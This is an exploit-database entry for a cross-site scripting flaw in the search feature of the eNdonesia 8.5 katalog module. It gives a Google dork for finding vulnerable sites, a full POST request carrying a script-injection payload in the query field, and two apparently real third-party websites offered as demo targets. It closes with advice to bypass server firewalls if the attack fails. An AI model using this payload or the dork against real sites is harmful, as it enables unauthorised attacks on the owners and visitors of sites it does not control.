eNdonesia 8.5 katalog Module Cross Site Scripting

# Exploit Title: eNdonesia 8.5 katalog Module Cross Site Scripting

# Google Dork: inurl:mod.php?mod=katalog&op=search

# Date: 07/28/2012

# Author: Crim3R

# download Link : http://nchc.dl.sourceforge.net/project/endonesia/eNdonesia/eNdonesia.8.5/endonesia.8.5.zip

# Version: 8.5

# Tested on: win 7

 

===============[Vuln Codes]=============

POST DATA :

POST /mod.php?mod=katalog&op=search HTTP/1.1
Content-Length: 73
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=bd754cf29d75a9a9a2854bce167b7a3b
Host: www.Vuln-target.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

query=<script>alert(0);</script>

D3MO:

 

http://www.planethijau.com/mod.php?mod=katalog&op=search

 

http://www.mimbar-opini.com/mod.php?mod=katalog&op=search
if xss didnt worked in some targets Consider server security & firewalls and try to bypass it ;)

[email protected]===========


$home = http://Secure-Land.net

thanks to :  2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir

and all Secure-land Members ...



#  0day.today [2018-04-07]  #